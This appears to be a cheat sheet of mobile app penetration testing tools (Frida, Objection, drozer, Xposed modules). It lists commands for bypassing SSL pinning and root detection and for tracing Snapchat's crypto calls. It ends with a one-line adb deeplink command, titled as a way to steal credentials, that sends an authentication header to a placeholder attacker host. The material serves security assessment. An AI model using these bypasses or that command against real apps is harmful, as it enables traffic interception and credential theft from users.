- Genymotion Cloud: Cloud-based Android emulators running on SaaS or as virtual images on AWS, GCP or Alibaba Cloud (PaaS)
- Genymotion Desktop: Desktop Android emulator
Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
- Python 3
sudo pip install frida-tools
Launch Snapchat on your iPhone and trace crypto API calls:
frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"
Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
git clone https://github.com/sensepost/objection
pip3 install objection
SSL pinning bypass for iOS:
objection -N explore -q
SSL pinning bypass for Android:
objection -N explore -q
- http://pentestcorner.com/introduction-to-fridump/: Memory dumper tool for Android and iOS
Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.
- Jailbroken device
- Apt 0.7 Strict
Framework that can change the behaviour of the system and apps without touching any APKs
drozer console connect
- https://github.com/mwrlabs/drozer: The Leading Security Assessment Framework for Android
Cydia Substrate - Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected into the target process's memory.
- Disabling OkHttp’s SSL Pinning on Android Apps https://medium.com/@cooperthecoder/disabling-okhttps-ssl-pinning-on-android-bd116aa74e05
- Xposed Module: Just Trust Me - Xposed Module to bypass SSL certificate pinning.
adb install ./JustTrustMe.apk
- Xposed Module: SSLUnpinning - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).
adb install mobi.acpm.sslunpinning_latest.apk
- Cydia Substrate Module: Android SSL Trust Killer: Blackbox tool to bypass SSL certificate pinning for most applications running on a device.
adb install Android-SSL-TrustKiller.apk
- Frida CodeShare: The Frida CodeShare project is comprised of developers from around the world working together with one goal - push Frida to its limits in new and innovative ways.
- Bypassing Root Detection
frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY
- Bypassing SSL Pinning
frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY
- Just Trust Me
- Root Detection:
How to use an open redirect to steal credentials:
adb shell am start -a android.intent.action.VIEW $INTENT://$DEEPLINK?$PARAM=https://$ATTACKER --ez authentication_header true